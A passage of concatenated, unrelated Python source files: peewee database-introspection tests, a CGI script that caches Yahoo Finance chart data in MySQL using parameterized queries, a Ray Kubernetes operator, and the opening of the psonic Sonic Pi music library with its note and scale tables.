             'indexedmodel'),
            ('indexedmodel_first_last_dob', ['first', 'last', 'dob'], True,
             'indexedmodel')])

    def test_get_columns(self):
        columns = self.database.get_columns('indexedmodel')
        data = [(c.name, c.null, c.primary_key, c.table)
                for c in columns]
        self.assertEqual(data, [
            ('id', False, True, 'indexedmodel'),
            ('first', False, False, 'indexedmodel'),
            ('last', False, False, 'indexedmodel'),
            ('dob', False, False, 'indexedmodel')])

        columns = self.database.get_columns('category')
        data = [(c.name, c.null, c.primary_key, c.table)
                for c in columns]
        self.assertEqual(data, [
            ('name', False, True, 'category'),
            ('parent_id', True, False, 'category')])

    def test_get_primary_keys(self):
        primary_keys = self.database.get_primary_keys('users')
        self.assertEqual(primary_keys, ['id'])
        # Category uses a non-integer ('name') primary key.
        primary_keys = self.database.get_primary_keys('category')
        self.assertEqual(primary_keys, ['name'])

    @requires_models(User, Tweet, Category)
    def test_get_foreign_keys(self):
        foreign_keys = self.database.get_foreign_keys('tweet')
        data = [(fk.column, fk.dest_table, fk.dest_column, fk.table)
                for fk in foreign_keys]
        self.assertEqual(data, [
            ('user_id', 'users', 'id', 'tweet')])

        # Category is self-referential via parent_id.
        foreign_keys = self.database.get_foreign_keys('category')
        data = [(fk.column, fk.dest_table, fk.dest_column, fk.table)
                for fk in foreign_keys]
        self.assertEqual(data, [
            ('parent_id', 'category', 'name', 'category')])
class TestSortModels(BaseTestCase):
    def test_sort_models(self):
        """sort_models() must order models so FK targets come first."""
        class A(Model):
            pass
        class B(Model):
            a = ForeignKeyField(A)
        class C(Model):
            b = ForeignKeyField(B)
        class D(Model):
            c = ForeignKeyField(C)
        class E(Model):
            pass

        expected = [A, B, C, D, E]
        # Every input ordering must sort to the same dependency order.
        for shuffled in permutations(expected):
            self.assertEqual(sort_models(shuffled), expected)
class TestDBProxy(BaseTestCase):
    def test_db_proxy(self):
        # Models may bind to a Proxy before any real database exists.
        db = Proxy()
        class BaseModel(Model):
            class Meta:
                database = db
        class User(BaseModel):
            username = TextField()
        class Tweet(BaseModel):
            user = ForeignKeyField(User, backref='tweets')
            message = TextField()

        sqlite_db = SqliteDatabase(':memory:')
        db.initialize(sqlite_db)

        # After initialize(), model metadata resolves to the real database.
        self.assertEqual(User._meta.database.database, ':memory:')
        self.assertEqual(Tweet._meta.database.database, ':memory:')

        # Connection state is shared through the proxy.
        self.assertTrue(User._meta.database.is_closed())
        self.assertTrue(Tweet._meta.database.is_closed())
        sqlite_db.connect()
        self.assertFalse(User._meta.database.is_closed())
        self.assertFalse(Tweet._meta.database.is_closed())
        sqlite_db.close()
|
index.py | #!/usr/bin/pypy3
#!/usr/bin/python3
from urllib.request import urlopen
import cgi
import mysql.connector
from datetime import datetime, timedelta, date
from threading import Thread
import json
def commit(ticker, iinterval, rrange, results, cursor, cnx):
    """Replace the cached row for (ticker, iinterval, rrange) with results.

    Deletes any stale row, inserts the fresh payload with a timestamp,
    then closes the cursor and connection (runs on a worker thread).
    """
    # SECURITY FIX: ticker/interval/range come straight from the HTTP
    # request -- use parameterized queries, never string interpolation.
    sql1 = ("DELETE FROM yahoofinances WHERE ticker=%s AND iinterval=%s "
            "AND rrange=%s;")
    sql2 = "INSERT INTO yahoofinances VALUES(%s, %s, %s, %s, %s);"
    cursor.execute(sql1, (ticker, iinterval, rrange))
    cnx.commit()
    cursor.execute(sql2, (ticker, iinterval, rrange, results,
                          str(datetime.now())))
    cnx.commit()
    cursor.close()
    cnx.close()
def expected(dump):
    # TODO(review): stub -- always accepts the fetched payload. Should
    # validate that `dump` parses as the expected Yahoo chart JSON before
    # the caller caches it.
    return True
def site(ticker, iinterval, rrange):
    """Fetch chart JSON for ticker from Yahoo Finance and return it as str."""
    if len(ticker) == 7 and ticker[3] == '/':
        # FX pairs: 'EUR/USD' -> 'EURUSD=X' (Yahoo's ticker format).
        ticker = '{}{}=X'.format(ticker[:3], ticker[4:])
    url = ('https://query1.finance.yahoo.com/v8/finance/chart/'
           '{}?interval={}&range={}'.format(ticker, iinterval, rrange))
    return urlopen(url).read().decode('utf-8')
def main():
    """CGI entry point: serve chart data from cache or Yahoo.

    Returns a JSON string (the caller encodes and prints it).
    """
    form = cgi.FieldStorage()
    try:
        ticker = str(form['ticker_symbol'].value)
    except KeyError:
        # BUG FIX: the caller does .encode() on the return value, so error
        # paths must return a JSON *string*, not a dict.
        return json.dumps({'error': 'Invalid parameter'})
    try:
        iinterval = str(form['interval'].value)
    except KeyError:
        iinterval = '1d'
    try:
        rrange = str(form['range'].value)
    except KeyError:
        rrange = '1y'

    cnx = mysql.connector.connect(user='api', database='projectapi')
    cursor = cnx.cursor(buffered=True)
    # SECURITY FIX: parameterized query -- request fields must never be
    # interpolated into SQL.
    sql = ("SELECT * FROM yahoofinances WHERE ticker=%s AND iinterval=%s "
           "AND rrange=%s;")
    cursor.execute(sql, (ticker, iinterval, rrange))

    cache_results = ''
    cache_expired = False
    fetch_results = ''
    results = ''
    try:
        data = list(cursor.fetchall()[0])
        # Rows older than a day count as expired (reuse the IndexError
        # path that also covers "no cached row at all").
        if (datetime.now() - timedelta(days=1)) > data[4]:
            raise IndexError('expired')
        cache_results = data[3]
        cursor.close()
        cnx.close()
    except Exception:
        cache_expired = True
        fetch_results = site(ticker, iinterval, rrange)
    finally:
        if not cache_expired:
            results = cache_results
        elif expected(fetch_results):
            # BUG FIX: commit() takes (ticker, iinterval, rrange, results,
            # cursor, cnx); the old call dropped iinterval/rrange, so the
            # thread died with TypeError and the cache was never refreshed.
            t1 = Thread(target=commit,
                        args=(ticker, iinterval, rrange, fetch_results,
                              cursor, cnx))
            t1.start()
            results = fetch_results
        elif cache_expired:
            results = cache_results
        else:
            results = json.dumps({'error': 'api access problem'})

    output = json.loads(results)
    if iinterval == '1d' and rrange == '1y':
        # Trim the series to at most 250 trading days: drop today's
        # (incomplete) candle from the end, otherwise drop the oldest.
        yesterday = datetime.combine(datetime.utcnow().date(),
                                     datetime.min.time()) - timedelta(hours=24)
        result0 = output['chart']['result'][0]
        quote = result0['indicators']['quote'][0]
        adjclose = result0['indicators']['adjclose'][0]['adjclose']
        while len(result0['timestamp']) > 250:
            last_ts = result0['timestamp'][-1] + result0['meta']['gmtoffset']
            idx = -1 if datetime.utcfromtimestamp(last_ts) > yesterday else 0
            result0['timestamp'].pop(idx)
            for key in ('low', 'high', 'open', 'close', 'volume'):
                quote[key].pop(idx)
            adjclose.pop(idx)
    return json.dumps(output)
if __name__ == '__main__':
    # CGI response: content-type header, blank line, then the JSON body.
    print('Content-type:application/json', end='\r\n\r\n')
    # Round-trip through UTF-8 dropping any unencodable characters.
    print(main().encode(encoding='UTF-8',errors='ignore').decode(), end='')
|
operator.py | import logging
import multiprocessing as mp
import os
import time
import threading
from typing import Any
from typing import Callable
from typing import Dict
from typing import Tuple
from typing import Optional
from kubernetes.client.exceptions import ApiException
import yaml
import ray.autoscaler._private.monitor as monitor
from ray._private import services
from ray.autoscaler._private import commands
from ray.ray_operator import operator_utils
from ray.ray_operator.operator_utils import AUTOSCALER_RETRIES_FIELD
from ray.ray_operator.operator_utils import STATUS_AUTOSCALING_EXCEPTION
from ray.ray_operator.operator_utils import STATUS_ERROR
from ray.ray_operator.operator_utils import STATUS_RUNNING
from ray.ray_operator.operator_utils import STATUS_UPDATING
from ray import ray_constants
logger = logging.getLogger(__name__)
# Queue to process cluster status updates.
cluster_status_q = mp.Queue() # type: mp.Queue[Tuple[str, str, str]]
class RayCluster():
    """Manages an autoscaling Ray cluster.

    Attributes:
        config: Autoscaling configuration dict.
        subprocess: The subprocess used to create, update, and monitor the
            Ray cluster.
    """

    def __init__(self, config: Dict[str, Any]):
        self.config = config
        self.name = self.config["cluster_name"]
        self.namespace = self.config["provider"]["namespace"]

        # Make directory for configs of clusters in the namespace,
        # if the directory doesn't exist already.
        namespace_dir = operator_utils.namespace_dir(self.namespace)
        if not os.path.isdir(namespace_dir):
            os.mkdir(namespace_dir)

        self.config_path = operator_utils.config_path(
            cluster_namespace=self.namespace, cluster_name=self.name)

        # Tracks metadata.generation field of associated custom resource.
        # K8s increments this field whenever the spec of the custom resource is
        # updated.
        self._generation = 0
        # Tracks metadata.labels.autoscalerRetries field of the CR.
        # The operator increments this field whenever we attempt recovery from
        # autoscaler failure.
        self._num_retries = 0

        # Monitor subprocess
        self.subprocess = None  # type: Optional[mp.Process]
        # Monitor logs for this cluster will be prefixed by the monitor
        # subprocess name:
        self.subprocess_name = ",".join([self.name, self.namespace])
        self.monitor_stop_event = mp.Event()
        self.setup_logging()

    def create_or_update(self, restart_ray: bool = False) -> None:
        """ Create/update the Ray Cluster and run the monitoring loop, all in a
        subprocess.

        The main function of the Operator is managing the
        subprocesses started by this method.

        Args:
            restart_ray: If True, restarts Ray to recover from failure.
        """
        self.do_in_subprocess(self._create_or_update, args=(restart_ray, ))

    def _create_or_update(self, restart_ray: bool = False) -> None:
        # Runs inside the monitor subprocess.
        try:
            self.start_head(restart_ray=restart_ray)
            self.start_monitor()
        except Exception:
            # Report failed autoscaler status to trigger cluster restart.
            cluster_status_q.put((self.name, self.namespace,
                                  STATUS_AUTOSCALING_EXCEPTION))
            # `status_handling_loop` will increment the
            # `status.AutoscalerRetries` of the CR. A restart will trigger
            # at the subsequent "MODIFIED" event.
            raise

    def start_head(self, restart_ray: bool = False) -> None:
        """Create or update the Ray head node via the autoscaler commands."""
        self.write_config()
        # Don't restart Ray on head unless recovering from failure.
        no_restart = not restart_ray
        # Create or update cluster head and record config side effects.
        self.config = commands.create_or_update_cluster(
            self.config_path,
            override_min_workers=None,
            override_max_workers=None,
            no_restart=no_restart,
            restart_only=False,
            yes=True,
            no_config_cache=True,
            no_monitor_on_head=True)
        # Write the resulting config for use by the autoscaling monitor:
        self.write_config()

    def start_monitor(self) -> None:
        """Runs the autoscaling monitor."""
        ray_head_pod_ip = commands.get_head_node_ip(self.config_path)
        port = operator_utils.infer_head_port(self.config)
        redis_address = services.address(ray_head_pod_ip, port)
        self.mtr = monitor.Monitor(
            redis_address=redis_address,
            autoscaling_config=self.config_path,
            redis_password=ray_constants.REDIS_DEFAULT_PASSWORD,
            prefix_cluster_info=True,
            stop_event=self.monitor_stop_event)
        self.mtr.run()

    def do_in_subprocess(self, f: Callable[[], None], args: Tuple) -> None:
        """Run f(*args) in a fresh daemon subprocess, replacing any old one."""
        # First stop the subprocess if it's alive
        self.clean_up_subprocess()
        # Reinstantiate process with f as target and start.
        self.subprocess = mp.Process(
            name=self.subprocess_name, target=f, args=args, daemon=True)
        self.subprocess.start()

    def clean_up_subprocess(self) -> None:
        """
        Clean up the monitor process.

        Executed when CR for this cluster is "DELETED".
        Executed when Autoscaling monitor is restarted.
        """
        if self.subprocess and self.subprocess.is_alive():
            # Triggers graceful stop of the monitor loop.
            self.monitor_stop_event.set()
            self.subprocess.join()
            # Clears the event for subsequent runs of the monitor.
            self.monitor_stop_event.clear()

    def clean_up(self) -> None:
        """Executed when the CR for this cluster is "DELETED".

        The key thing is to end the monitoring subprocess.
        """
        self.clean_up_subprocess()
        self.clean_up_logging()
        self.delete_config()

    def setup_logging(self) -> None:
        """Add a log handler which appends the name and namespace of this
        cluster to the cluster's monitor logs.
        """
        self.handler = logging.StreamHandler()
        # Filter by subprocess name to get this cluster's monitor logs.
        self.handler.addFilter(
            lambda rec: rec.processName == self.subprocess_name)
        # Lines start with "<cluster name>,<cluster namespace>:"
        logging_format = ":".join(
            [self.subprocess_name, ray_constants.LOGGER_FORMAT])
        self.handler.setFormatter(logging.Formatter(logging_format))
        operator_utils.root_logger.addHandler(self.handler)

    def clean_up_logging(self) -> None:
        """Detach this cluster's log handler from the root logger."""
        operator_utils.root_logger.removeHandler(self.handler)

    def set_config(self, config: Dict[str, Any]) -> None:
        self.config = config

    def write_config(self) -> None:
        """Write config to disk for use by the autoscaling monitor."""
        with open(self.config_path, "w") as file:
            yaml.dump(self.config, file)

    def delete_config(self) -> None:
        # Remove the on-disk config written by write_config().
        os.remove(self.config_path)

    def set_generation(self, generation: int) -> None:
        self._generation = generation

    def set_num_retries(self, num_retries: int) -> None:
        self._num_retries = num_retries

    def get_generation(self) -> int:
        return self._generation

    def get_num_retries(self) -> int:
        return self._num_retries
# Maps ray cluster (name, namespace) pairs to RayCluster python objects.
ray_clusters = {} # type: Dict[Tuple[str, str], RayCluster]
def run_event_loop():
    """Watch RayCluster custom resources and dispatch each event."""
    # Instantiate event stream (namespace-scoped or cluster-scoped).
    if operator_utils.NAMESPACED_OPERATOR:
        stream = operator_utils.namespaced_cr_stream(
            namespace=operator_utils.OPERATOR_NAMESPACE)
    else:
        stream = operator_utils.cluster_scoped_cr_stream()
    # Run control loop.
    for event in stream:
        cluster_cr = event["object"]
        metadata = cluster_cr["metadata"]
        handle_event(event["type"], cluster_cr,
                     metadata["name"], metadata["namespace"])
def handle_event(event_type, cluster_cr, cluster_name, cluster_namespace):
    """Apply one CR watch event, reporting failures via the status queue.

    TODO: This only detects errors in the parent process and thus doesn't
    catch cluster-specific autoscaling failures. Fix that (perhaps at
    the same time that we eliminate subprocesses).
    """
    try:
        cluster_action(event_type, cluster_cr, cluster_name, cluster_namespace)
    except Exception:
        # BUG FIX: str.join takes a single iterable; the old call passed two
        # positional args and raised TypeError here, masking the real error.
        log_prefix = ",".join([cluster_name, cluster_namespace])
        if event_type in ["ADDED", "MODIFIED"]:
            logger.exception(f"{log_prefix}: Error while updating RayCluster.")
            cluster_status_q.put((cluster_name, cluster_namespace,
                                  STATUS_ERROR))
        elif event_type == "DELETED":
            # Don't try to update CRD's status if the CRD is gone.
            logger.exception(
                f"Error while deleting RayCluster {cluster_name}.")
def cluster_action(event_type: str, cluster_cr: Dict[str, Any],
                   cluster_name: str, cluster_namespace: str) -> None:
    """Translate one CR watch event into RayCluster lifecycle operations."""
    cluster_config = operator_utils.cr_to_config(cluster_cr)
    cluster_identifier = (cluster_name, cluster_namespace)
    log_prefix = ",".join(cluster_identifier)

    if event_type == "ADDED":
        operator_utils.check_redis_password_not_specified(
            cluster_config, cluster_identifier)
        cluster_status_q.put((cluster_name, cluster_namespace,
                              STATUS_UPDATING))
        ray_cluster = RayCluster(cluster_config)
        # Track changes to the custom resource's spec field:
        generation = cluster_cr["metadata"]["generation"]
        ray_cluster.set_generation(generation)
        logger.info(f"{log_prefix}: Launching cluster.")
        ray_cluster.create_or_update()
        ray_clusters[cluster_identifier] = ray_cluster
        cluster_status_q.put((cluster_name, cluster_namespace, STATUS_RUNNING))
    elif event_type == "MODIFIED":
        ray_cluster = ray_clusters[cluster_identifier]
        # Check metadata.generation to determine if there's a spec change.
        current_generation = cluster_cr["metadata"]["generation"]
        # Check metadata.labels.autoscalerRetries to see if we need to restart
        # Ray processes.
        status = cluster_cr.get("status", {})
        autoscaler_retries = status.get(AUTOSCALER_RETRIES_FIELD, 0)

        # True if there's been a change to the spec of the custom resource,
        # triggering an increment of metadata.generation:
        spec_changed = current_generation > ray_cluster.get_generation()
        # True if monitor has failed, triggering an increment of
        # status.autoscalerRetries:
        ray_restart_required = (autoscaler_retries >
                                ray_cluster.get_num_retries())
        if ray_restart_required:
            logger.error(f"{log_prefix}: Failed, restarting cluster.")
            ray_cluster.set_num_retries(autoscaler_retries)
        if spec_changed:
            logger.info(f"{log_prefix}: Updating cluster.")
            ray_cluster.set_generation(current_generation)

        # Update if there's been a change to the spec or if we're attempting
        # recovery from autoscaler failure.
        if spec_changed or ray_restart_required:
            cluster_status_q.put((cluster_name, cluster_namespace,
                                  STATUS_UPDATING))
            ray_cluster.set_config(cluster_config)
            # Trigger Ray restart only if there's been a failure.
            ray_cluster.create_or_update(restart_ray=ray_restart_required)
            cluster_status_q.put((cluster_name, cluster_namespace,
                                  STATUS_RUNNING))
    elif event_type == "DELETED":
        ray_cluster = ray_clusters[cluster_identifier]
        ray_cluster.clean_up()
        del ray_clusters[cluster_identifier]
def status_handling_loop():
    """Consume (name, namespace, phase) tuples from cluster_status_q and
    patch the corresponding RayCluster custom resource's status.

    Runs forever on its own thread; a failure to set one status is logged
    and skipped so that a single bad update cannot kill the thread.
    """
    while True:
        cluster_name, cluster_namespace, phase = cluster_status_q.get()
        try:
            operator_utils.set_status(cluster_name, cluster_namespace, phase)
        except Exception:
            # Bug fix: str.join takes a single iterable, not two positional
            # arguments -- the original call raised TypeError right here,
            # masking the exception being logged.
            log_prefix = ",".join([cluster_name, cluster_namespace])
            logger.exception(f"{log_prefix}: Error setting RayCluster status.")
def main() -> None:
    """Operator entry point: start the status thread, then run the event loop."""
    # Status updates run on a daemon thread so Kubernetes API latency never
    # blocks the main event loop.
    status_handler = threading.Thread(target=status_handling_loop, daemon=True)
    status_handler.start()

    # Ensure the directory holding generated Ray cluster configs exists.
    if not os.path.isdir(operator_utils.RAY_CONFIG_DIR):
        os.mkdir(operator_utils.RAY_CONFIG_DIR)

    while True:
        # This outer loop waits for creation of a RayCluster CRD if it hasn't
        # already been created.
        try:
            run_event_loop()
        except ApiException as e:
            if e.status != 404:
                logger.error("Failed to enter operator event loop.")
                # Unforeseen startup error. Operator pod is
                # likely to end up in a crash loop.
                raise
            # The RayCluster CRD is not registered yet; poll until it appears.
            logger.warning("Waiting for creation of the RayCluster CRD")
            time.sleep(5)
if __name__ == "__main__":
main()
|
psonic.py | # The MIT License (MIT)
#
# Copyright (c) 2016 G. Völkl
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import random
import time
import threading
from pythonosc import osc_message_builder # osc support
from pythonosc import udp_client
__debug = False
## Base Classes ##
class Synth:
    """A named Sonic Pi synthesizer (used to build `use_synth :<name>`)."""

    def __init__(self, name):
        # Sonic Pi identifier of this synth, e.g. 'saw' or 'tb303'.
        self.name = name
class Sample:
    """A named built-in Sonic Pi sample (used to build `sample :<name>`)."""

    def __init__(self, name):
        # Sonic Pi identifier of this sample, e.g. 'bd_haus'.
        self.name = name
class ChordQuality:
    """A chord quality: a name plus its half-tone interval pattern."""

    def __init__(self, name, inter):
        self.name, self.inter = name, inter
class FxName:
    """A named Sonic Pi FX effect."""

    def __init__(self, name):
        # Sonic Pi identifier of the effect, e.g. 'reverb'.
        self.name = name
class Message:
    """Broadcast primitive for synchronising threads.

    Threads block in sync(); any other thread calls cue() to wake all of
    them at once (mirrors Sonic Pi's cue/sync).
    """

    def __init__(self):
        self._condition = threading.Condition()

    def cue(self):
        """Wake every thread currently blocked in sync()."""
        with self._condition:
            # notify_all() is the modern spelling; notifyAll() is a
            # deprecated camelCase alias per the threading docs.
            self._condition.notify_all()

    def sync(self):
        """Block until another thread calls cue()."""
        with self._condition:
            self._condition.wait()
class Fx:
    """Parameters for a Sonic Pi FX block.

    Usable as a context manager (mirroring Sonic Pi's `with_fx`), although
    enter/exit currently perform no setup or teardown.
    """

    def __init__(self, mode, phase=0.24, probability=0, prob_pos=0):
        self.mode, self.phase = mode, phase
        self.probability, self.prob_pos = probability, prob_pos

    def __enter__(self):
        # No setup yet; returns None like a bare `pass`.
        pass

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Nothing to tear down.
        pass
## Decorator ##
def in_thread(func):
    """Decorator: run the wrapped function on a new thread.

    Improvements over the original wrapper, all backward-compatible:
    positional/keyword arguments are forwarded to *func*, the wrapped
    function's metadata is preserved via functools.wraps, and the started
    Thread is returned so callers may join() it.
    """
    import functools

    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        _thread = threading.Thread(target=func, args=args, kwargs=kwargs)
        _thread.start()
        return _thread

    return wrapper
## Notes ##
C2 = 36
Cs2 = 37
Db2 = Cs2
D2 = 38
Ds2 = 39
Eb2 = Ds2
E2 = 40
F2 = 41
Fs2 = 42
Gb2 = Fs2
G2 = 43
Gs2 = 44
Ab2 = Gs2
A2 = 45
As2 = 46
Bb2 = As2
B2 = 47
C3 = 48
Cs3 = 49
Db3 = Cs3
D3 = 50
Ds3 = 51
Eb3 = Ds3
E3 = 52
F3 = 53
Fs3 = 54
Gb3 = Fs3
G3 = 55
Gs3 = 56
Ab3 = Gs3
A3 = 57
As3 = 58
Bb3 = As3
B3 = 59
C4 = 60
Cs4 = 61
Db4 = Cs4
D4 = 62
Ds4 = 63
Eb4 = Ds4
E4 = 64
F4 = 65
Fs4 = 66
Gb4 = Fs4
G4 = 67
Gs4 = 68
Ab4 = Gs4
A4 = 69
As4 = 70
Bb4 = As4
B4 = 71
C5 = 72
Cs5 = 73
Db5 = Cs5
D5 = 74
Ds5 = 75
Eb5 = Ds5
E5 = 76
F5 = 77
Fs5 = 78
Gb5 = Fs5
G5 = 79
Gs5 = 80
Ab5 = Gs5
A5 = 81
As5 = 82
Bb5 = As5
B5 = 83
C6 = 84
R = 0
## Synthesizer ##
DULL_BELL = Synth('dull_bell')
PRETTY_BELL = Synth('pretty_bell')
SINE = Synth('sine')
SQUARE = Synth('square')
PULSE = Synth('pulse')
SUBPULSE = Synth('subpulse')
DTRI = Synth('dtri')
DPULSE = Synth('dpulse')
FM = Synth('fm')
MOD_FM = Synth('mod_fm')
MOD_SAW = Synth('mod_saw')
MOD_DSAW = Synth('mod_dsaw')
MOD_SINE = Synth('mod_sine')
MOD_TRI = Synth('mod_tri')
MOD_PULSE = Synth('mod_pulse')
SUPERSAW = Synth('supersaw')
HOOVER = Synth('hoover')
SYNTH_VIOLIN = Synth('synth_violin')
PLUCK = Synth('pluck')
PIANO = Synth('piano')
GROWL = Synth('growl')
DARK_AMBIENCE = Synth('dark_ambience')
DARK_SEA_HORN = Synth('dark_sea_horn')
HOLLOW = Synth('hollow')
ZAWA = Synth('zawa')
NOISE = Synth('noise')
GNOISE = Synth('gnoise')
BNOISE = Synth('bnoise')
CNOISE = Synth('cnoise')
DSAW = Synth('dsaw')
TB303 = Synth('tb303')
BLADE = Synth('blade')
PROPHET = Synth('prophet')
SAW = Synth('saw')
BEEP = Synth('beep')
TRI = Synth('tri')
CHIPLEAD = Synth('chiplead') # Sonic Pi 2.10
CHIPBASS = Synth('chipbass')
CHIPNOISE = Synth('chipnoise')
TECHSAWS = Synth('tech_saws') # Sonic Pi 2.11
SOUND_IN = Synth('sound_in')
SOUND_IN_STEREO = Synth('sound_in_stereo')
## Scale Mode (from sonic pi)##
DIATONIC = 'diatonic'
IONIAN = 'ionian'
MAJOR = 'major'
DORIAN = 'dorian'
PHRYGIAN = 'phrygian'
LYDIAN = 'lydian'
MIXOLYDIAN = 'mixolydian'
AEOLIAN = 'aeolian'
MINOR = 'minor'
LOCRIAN = 'locrian'
HEX_MAJOR6 = 'hex_major6'
HEX_DORIAN = 'hex_dorian'
HEX_PHRYGIAN = 'hex_phrygian'
HEX_MAJOR7 = 'hex_major7'
HEX_SUS = 'hex_sus'
HEX_AEOLIAN = 'hex_aeolian'
MINOR_PENTATONIC = 'minor_pentatonic'
YU = 'yu'
MAJOR_PENTATONIC = 'major_pentatonic'
GONG = 'gong'
EGYPTIAN = 'egyptian'
SHANG = 'shang'
JIAO = 'jiao'
ZHI = 'zhi'
RITUSEN = 'ritusen'
WHOLE_TONE = 'whole_tone'
WHOLE = 'whole'
CHROMATIC = 'chromatic'
HARMONIC_MINOR = 'harmonic_minor'
MELODIC_MINOR_ASC = 'melodic_minor_asc'
HUNGARIAN_MINOR = 'hungarian_minor'
OCTATONIC = 'octatonic'
MESSIAEN1 = 'messiaen1'
MESSIAEN2 = 'messiaen2'
MESSIAEN3 = 'messiaen3'
MESSIAEN4 = 'messiaen4'
MESSIAEN5 = 'messiaen5'
MESSIAEN6 = 'messiaen6'
MESSIAEN7 = 'messiaen7'
SUPER_LOCRIAN = 'super_locrian'
HIRAJOSHI = 'hirajoshi'
KUMOI = 'kumoi'
NEAPLOLITAN_MAJOR = 'neapolitan_major'
BARTOK = 'bartok'
BHAIRAV = 'bhairav'
LOCRIAN_MAJOR = 'locrian_major'
AHIRBHAIRAV = 'ahirbhairav'
ENIGMATIC = 'enigmatic'
NEAPLOLITAN_MINOR = 'neapolitan_minor'
PELOG = 'pelog'
AUGMENTED2 = 'augmented2'
SCRIABIN = 'scriabin'
HARMONIC_MAJOR = 'harmonic_major'
MELODIC_MINOR_DESC = 'melodic_minor_desc'
ROMANIAN_MINOR = 'romanian_minor'
HINDU = 'hindu'
IWATO = 'iwato'
MELODIC_MINOR = 'melodic_minor'
DIMISHED2 = 'diminished2'
MARVA = 'marva'
MELODIC_MAJOR = 'melodic_major'
INDIAN = 'indian'
SPANISH = 'spanish'
PROMETHEUS = 'prometheus'
DIMISHED = 'diminished'
TODI = 'todi'
LEADING_WHOLE = 'leading_whole'
AUGMENTED = 'augmented'
PRUVI = 'purvi'
CHINESE = 'chinese'
LYDIAN_MINOR = 'lydian_minor'
I = 'i'
II = 'ii'
III = 'iii'
IV = 'iv'
V = 'v'
VI = 'vi'
VII = 'vii'
VIII = 'viii'
_ionian_sequence = [2, 2, 1, 2, 2, 2, 1]
_hex_sequence = [2, 2, 1, 2, 2, 3]
_pentatonic_sequence = [3, 2, 2, 3, 2]
_SCALE_MODE = {
'diatonic': _ionian_sequence,
'ionian': _ionian_sequence,
'major': _ionian_sequence,
'dorian': _ionian_sequence[1:] + _ionian_sequence[:1], # rotate 1
'phrygian': _ionian_sequence[2:] + _ionian_sequence[:2], # rotate(2)
'lydian': _ionian_sequence[3:] + _ionian_sequence[:3], # rotate(3)
'mixolydian': _ionian_sequence[4:] + _ionian_sequence[:4], # rotate(4)
'aeolian': _ionian_sequence[5:] + _ionian_sequence[:5], # rotate(5)
'minor': _ionian_sequence[5:] + _ionian_sequence[:5], # rotate(5)
'locrian': _ionian_sequence[6:] + _ionian_sequence[:6], # rotate(6)
'hex_major6': _hex_sequence,
'hex_dorian': _hex_sequence[1:] + _hex_sequence[:1], # rotate(1)
'hex_phrygian': _hex_sequence[2:] + _hex_sequence[:2], # rotate(2)
'hex_major7': _hex_sequence[3:] + _hex_sequence[:3], # rotate(3)
'hex_sus': _hex_sequence[4:] + _hex_sequence[:4], # rotate(4)
'hex_aeolian': _hex_sequence[5:] + _hex_sequence[:5], # rotate(5)
'minor_pentatonic': _pentatonic_sequence,
'yu': _pentatonic_sequence,
'major_pentatonic': _pentatonic_sequence[1:] + _pentatonic_sequence[:1], # rotate(1)
'gong': _pentatonic_sequence[1:] + _pentatonic_sequence[:1], # rotate(1)
'egyptian': _pentatonic_sequence[2:] + _pentatonic_sequence[:2], # rotate(2)
'shang': _pentatonic_sequence[2:] + _pentatonic_sequence[:2], # rotate(2)
'jiao': _pentatonic_sequence[3:] + _pentatonic_sequence[:3], # rotate(3)
'zhi': _pentatonic_sequence[4:] + _pentatonic_sequence[:4], # rotate(4)
'ritusen': _pentatonic_sequence[4:] + _pentatonic_sequence[:4], # rotate(4)
'whole_tone': [2, 2, 2, 2, 2, 2],
'whole': [2, 2, 2, 2, 2, 2],
'chromatic': [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
'harmonic_minor': [2, 1, 2, 2, 1, 3, 1],
'melodic_minor_asc': [2, 1, 2, 2, 2, 2, 1],
'hungarian_minor': [2, 1, 3, 1, 1, 3, 1],
'octatonic': [2, 1, 2, 1, 2, 1, 2, 1],
'messiaen1': [2, 2, 2, 2, 2, 2],
'messiaen2': [1, 2, 1, 2, 1, 2, 1, 2],
'messiaen3': [2, 1, 1, 2, 1, 1, 2, 1, 1],
'messiaen4': [1, 1, 3, 1, 1, 1, 3, 1],
'messiaen5': [1, 4, 1, 1, 4, 1],
'messiaen6': [2, 2, 1, 1, 2, 2, 1, 1],
'messiaen7': [1, 1, 1, 2, 1, 1, 1, 1, 2, 1],
'super_locrian': [1, 2, 1, 2, 2, 2, 2],
'hirajoshi': [2, 1, 4, 1, 4],
'kumoi': [2, 1, 4, 2, 3],
'neapolitan_major': [1, 2, 2, 2, 2, 2, 1],
'bartok': [2, 2, 1, 2, 1, 2, 2],
'bhairav': [1, 3, 1, 2, 1, 3, 1],
'locrian_major': [2, 2, 1, 1, 2, 2, 2],
'ahirbhairav': [1, 3, 1, 2, 2, 1, 2],
'enigmatic': [1, 3, 2, 2, 2, 1, 1],
'neapolitan_minor': [1, 2, 2, 2, 1, 3, 1],
'pelog': [1, 2, 4, 1, 4],
'augmented2': [1, 3, 1, 3, 1, 3],
'scriabin': [1, 3, 3, 2, 3],
'harmonic_major': [2, 2, 1, 2, 1, 3, 1],
'melodic_minor_desc': [2, 1, 2, 2, 1, 2, 2],
'romanian_minor': [2, 1, 3, 1, 2, 1, 2],
'hindu': [2, 2, 1, 2, 1, 2, 2],
'iwato': [1, 4, 1, 4, 2],
'melodic_minor': [2, 1, 2, 2, 2, 2, 1],
'diminished2': [2, 1, 2, 1, 2, 1, 2, 1],
'marva': [1, 3, 2, 1, 2, 2, 1],
'melodic_major': [2, 2, 1, 2, 1, 2, 2],
'indian': [4, 1, 2, 3, 2],
